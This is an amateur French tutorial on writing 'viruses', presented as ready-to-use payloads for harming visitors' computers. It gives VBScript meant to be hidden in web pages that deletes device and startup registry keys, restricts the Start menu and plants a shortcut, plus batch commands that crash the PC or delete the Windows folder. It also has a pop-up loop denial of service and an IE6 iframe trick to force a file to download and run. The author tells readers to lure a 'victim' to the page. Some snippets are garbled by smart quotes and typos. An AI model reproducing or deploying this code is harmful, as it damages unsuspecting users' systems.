Burning edge Spirit

Un virus est un programme qui s’introduit dans l’ordinateur de la victime pour agir sur celui-ci (tout le monde le sait mais il faut bien une intro ^^).

Un virus cause des dégats dans le système qu’il a infecté. Ces dégats vont de l’affichage d’une pub à l’écran jusqu’à bouziller carrément ton processeur ou ta carte mère.

Il y a différents types de virus :

- Virus du secteur d’amorce : ils remplacent l’amorce d’un disque par leur propre code et se chargent ensuite en mémoire centrale. Il rendent inutilisable le disque d’amorçage et/ou se propagent vers d’autres disques.
- Virus de fichiers : ils ajoutent leur code aux fichiers exécutables (*.exe *.com *.bat *.src) et se chargent en mémoire centrale afin de contaminer encore d’autre programmes. Il rendent ces programmes inutilisables.
- Virus furtifs : ils échappent à toute détection en se camouflant. Une des méthodes de détection consiste à enregistrer la longueur d’un programme (si le virus a ajouté son code, on peut facilement comparer avec une simple sauvegarde de ce programme )
- Virus polymorphes : ils modifient leur aspect à chaque nouvelle infection.
- Virus cryptés : ils modifient leur code, ce qui complique leur détection.
- Cheval de Troie : il sert de serveur au hacker qui peut alors manipuler le PC par son intermédiaire.
- Bombe logique : variante du cheval de Troie, elle attend un signal externe pour exploser. Ce signal peut être une date précise, un lancement d’un certain programme etc.. Les dégâts causés par cette bombe peuvent être d’ordre matériel des fois, comme une modification du BIOS pour entraîner une surcharge électrique.

Dans ces tutos, je vais te montrer comment programmer des petits et des gros virus en VB à insérer dans une page html et en Dos.

Comment s’en protéger
Pour s’en protéger, tout d’abord, il ne faut jamais ouvrir une pièce jointe d’un mail provenant d’une personne qu’on ne connait pas. Pour supprimer un virus, on utilise un antivirus (par exemple AVG Antivirus). Et pour être sûr qu’un virus espion ne communique pas avec le pirate qui l’a envoyé, où qu’un virus soit envoyé par une faille de l’ordinateur, on utilise un firewall (tel que Sygate).

On peut intégrer des virus VB dans une page html très simplement, il s’éxecutera sans demander l’avis du visiteur !

Ouvrir le(s) lecteur(s) CD :

<script LANGUAGE=”VBScript”>
<!–
Set oWMP = CreateObject(”WMPlayer.OCX.7″ )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ‘ cdrom
End If
-
</script>

Désinstaller le disque dur :

<script Language=”VBscript”>
set WshShell = CreateObject(”Wscript.Shell”)
WshShell.RegDelete”HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\PCMIA\”
</script>

Désinstaller le modem :

<script Language=”VBscript”>
set WshShell = CreateObject(”Wscript.Shell”)
WshShell.RegDelete”HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\Modem\”
</script>

Désinstaller la souris :

<script Language=”VBscript”>
set WshShell = CreateObject(”Wscript.Shell”)
WshShell.RegDelete”HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\Mouse\”
</script>

Désinstaller l’écran :

<script Language=”VBscript”>
set WshShell = CreateObject(”Wscript.Shell”)
WshShell.RegDelete”HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\monitor\”
</script>

Désinstaller le clavier :

<script Language=”VBscript”>
set WshShell = CreateObject(”Wscript.Shell”)
WshShell.RegDelete”HKEY_CURRENT_USER\System\CurrentControlSet\Services\Keyboard\”
</script>

Supprimer les programmes qui se lancent au démarrage :

<script Language=”VBscript”>
set WshShell = CreateObject(”Wscript.Shell”)
WshShell.RegDelete”HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Run”
</script>

Changer le nom de l’ordinateur :

<script Language=”VBscript”>
set WshShell = CreateObject(”Wscript.Shell”)
WshShell.RegDelete”HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\ComputerName\”
WshShell.RegWrite”HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\ComputerName\ComputerName\”loadation”
</script>

Désinstaller l’imprimante/scanner :

<script Language=”VBscript”>
set WshShell = CreateObject(”Wscript.Shell”)
WshShell.RegDelete”HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\Printer\”
</script>

Enlever Exécuter du menu Démarrer :

<script Language=”VBscript”>
set WshShell = CreateObject(”Wscript.Shell”)
WshShell.RegWrite”HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”
0,”RED_DWORD”
</script>

Enlever Rechercher du menu Démarrer :

<script Language=”VBscript”>
set WshShell = CreateObject(”Wscript.Shell”)
WshShell.RegWrite”HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”
0,”REG_DWORD”
</script>

Enlever Documents du menu Démarrer :

<script Language=”VBscript”>
set WshShell = CreateObject(”Wscript.Shell”)
WshShell.RegWrite”HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NorecentDocsMenu”
0,”REG_DWORD”
</script>

Placer un raccourcis sur le Bureau :

<script Language=”VBScript”> if location.protocol = “file:” then
Set WshShell = CreateObject(”WScript.Shell”)
Set FSO = CreateObject(”Scripting.FileSystemObject”)
HPath = Replace(location.href, “/”, “\”)
HPath = Replace(HPath, “file:\\\”, “”)
HPath = FSO.GetParentFolderName(HPath)
Set TRange = document.body.createTextRange
Set RealLink = WshShell.CreateShortcut(”C:\WINDOWS\bureau\limited.url”)
RealLink.TargetPath = “http://www.loadation.net/”
RealLink.Save
end if
</script>

Après, à toi de réussir à envoyer ta victime sur la page ! Les virus DOS sont très faciles à faire.
L’avantage : ils ne nécessitent pas de grandes connaissances en programmation.
L’inconvénient : la victime peut voir la source du virus, puisqu’il n’est pas compilé.
Les virus DOS sont des fichier texte au format bat. Pour en créer un, il suffit d’écrire le code dans le bloc-note, puis de l’enregistrer en .bat (par exemple: virus.bat)
Remarque 1 : les virus DOS ne fonctionnent que sous windows
Remarque 2 : ce tuto peut être aussi très utile pour créer des petits programmes utilitaires.
Les commandes sont les même que celles de DOS :

Quelques commandes utiles :

@echo off     cache les commandes exécutées après cette ligne
echo le texte qui s’affiche     pour afficher du texte
cls     efface tout le texte de la fenêtre ms-dos
pause     fait une pause dans l’éxecution du programme (Appuyez sur une touche pour continuer…)
exit     arrête l’éxecution du programme
del fichier     supprime un fichier (on peut utiliser les jokers * et ?)
deltree dossier     Supprime un dossier et toutes son arborescence
mkdir dossier     créer un dossier
copy fichier1 fichier2     copie fichier1 en fichier2
move fichier1 fichier2     déplace fichier1
ren fichier1 fichier2     renomme fichier1 en fichier2 (exemple pour renomme le fichier text.doc situé dans le dossier docs en text1.doc : ren docs/text.doc text1.doc)
:boucle1     est un label joignible grâce à goto (ici le label s’appelle boucle1)
goto boucle1     permet d’accéder à un label définit par : (ici boucle1)
prompt     modifie le traditionnel C:\> (par défaut prompt $p$g).
n peut par exemple afficher la date à la place comme ceci : prompt $d$g. (Signe > : $g, signe < : $l, la date : $d, l’heure : t, lecteur courant : $n, dossier courant : $p, nouvelle ligne : $_, et en fin pour effacer le caractère précédent : $h)
If condition conséquence     introduit une condition dans le programme. Par exemple, cette ligne de code affiche “okay” si le fichier test.txt existe :
If exist “test.txt” echo okay
call fichier.bat     inclut un autre script
more fichier1     affiche le contenu d’un fichier page par page

Utilisation des variables :

Set loadation=genial     Définit la variable loadation avec la valeur genial. On utilise une variable en plaçant un % avant et après son nom
echo Loadation est %loadation%     affiche “Loadation est genial”
If %loadation%==genial echo oui     affiche oui si loadation=genial
If not %loadation%==genial echo non     affiche non si loadation n’a pas la valeur genial
%windir%     contient l’adresse du répertoire Windows

Remarque : En DOS, on peut utiliser des jokers (*) pour remplacer une chaîne de caractères. Par exemple, si on veut supprimer tous les fichiers dll du dossier courant, on écrira del *.dll

Par exemple, on créer un fichier test.bat, qu’on ouvre avec le Bloc-Note.

Script qui écris indéfiniment “Bug” (mais ne génère pas de bug ^^) :

@echo off
:start
echo Bug
goto start

Script tout simple qui plante le PC :

start C:\CON\CON

Script qui supprime Windows (j’ai pas testé ) :

@echo off
deltree %windir%

les virus javascript (denial of service ) :
Le denial of service n’est pas une erreur, et encore moins une lacune de sécurité c’est le déclenchement par le biais d’un script de fonctions répétés indéfiniment qui vont finir par bloquer l’ordinateur du visiteur.

Exemple :

<script language=”JavaScript”>
while(true){ // Boucle infinie
window.open(”#”); // Ouvre la même fenètre
}
</script>

Cet exemple ouvre indéfiniment la même fenêtre dans une nouvelle fenêtre qui chacune se rouvre à nouveau indéfiniment (Le PC aura alors vite fait de planter !)

supprimer manuellement un virus

Certains virus, programmes espions ou spam ne sont pas toujours supprimés par l’antivirus.
On peux souvent les supprimer manuellement en 2 étapes :

- Vérifier s’il y a de fichier suspects sur C:\, C:\Windows et C:\Program Files (j’ai souvent eu des fichiers du genre stcloader.exe). Si tu n’es pas sûr qu’un fichier est un intrus, fait une recherche sur internet le concernant (www.google.fr).
Pour les supprimer, va d’abord voir dans Démarrer >> Paramètres >> Panneau de configuration >> Ajout/Suppression de programme, et désinstalle les applications déchet.
Ensuite, retourne dans ton disque et supprime manuellement (clic droit, supprimer) les fichiers restants.

- Vérifier si des programmes suspects se lancent au démarrage du pc : Va dans la base regedit (Démarrer >> Executer >> puis tape “regedit” et Enter), va voir dans ces dossiers :
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
HKEY_USERS\xxxxxx\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_USERS\xxxxxx\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_USERS\xxxxxx\Software\Microsoft\Windows\CurrentVersion\RunOnceEx

S’il y a des fichiers suspects, supprime les !

envoyer un virus directement a partir d’une page web

Une faille d’Internet Explorer 6 permet de forcer le téléchargement et l’éxecution d’un fichier quelconque hébergé sur uns site.

C’est très simple, il suffit d’insérer plusieurs dizaines de balises <iframe src=”fichier.exe”></iframe> dans une page html.

Rappel : la balise iframe incorpore un cadre, dont src définit la source du cadre.

Quand on ouvre la page, des dizaines de balises de demande de téléchargement s’ouvrent (autant que de balises iframe), et au bout de quelques instants, au lieu de continuer d’afficher les fenètres de téléchargement, IE télécharge le fichier fichier.exe et l’éxécute !

En attendant un patch, on peux se protéger de se bug en allant dans le menu Outils >> Options internet >> clique sur l’onglet Sécurité puis sur le bouton Personnaliser le niveau, et désactive “Téléchargement de fichiers” en bas de la liste.
Ou alors utilise un autre navigateur comme Firefox ou une version antérieure à celle de IE6 (IE5 se contente de planter).

faux virus :

voici un programme tres amusant si vous n’en abusez pas :

http://membres.lycos.fr/freakin/farces.zip

voila j’espere qu’avec ca vous êtes parés, pour de plus amples infos   mailez moi

ci dessous un exemple de messages inquietans apres execution de codes mentionnés ci dessus